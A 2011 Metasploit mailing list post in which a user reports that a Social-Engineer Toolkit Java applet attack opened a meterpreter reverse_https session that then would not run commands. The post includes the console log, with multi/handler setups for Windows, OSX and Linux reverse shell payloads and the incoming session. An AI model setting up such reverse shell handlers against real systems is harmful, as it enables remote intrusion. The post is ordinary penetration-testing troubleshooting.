Metasploit mailing list archives

meterpreter reverse https and set problem


From: audio audience <audience099 () gmail com>
Date: Tue, 16 Aug 2011 12:58:11 +0300

Hello,
I tested set java applet attack with meterpreter reverse https. This attack
seccessfully and meterpreter sessions opened but i couldn't run any
commands.

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD
windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD
osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 6.6.6.103
LHOST => 6.6.6.103
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD
linux/x86/shell/reverse_tcp
[*] Started reverse handler on 6.6.6.103:8080
[*] Starting the payload handler...
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 6.6.6.103
LHOST => 6.6.6.103
resource (src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf  exploit(handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...
[*] Started reverse handler on 6.6.6.103:8081
[*] Starting the payload handler...
[*] 6.6.6.102:54242 Request received for /INITM...
[*] 6.6.6.102:54242 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 1 opened (6.6.6.103:443 -> 6.6.6.102:54242) at
2011-08-16 12:47:53 +0300

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] Unknown command: getuid.
meterpreter > help

Do you have any idea ?
Thanks for supports.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: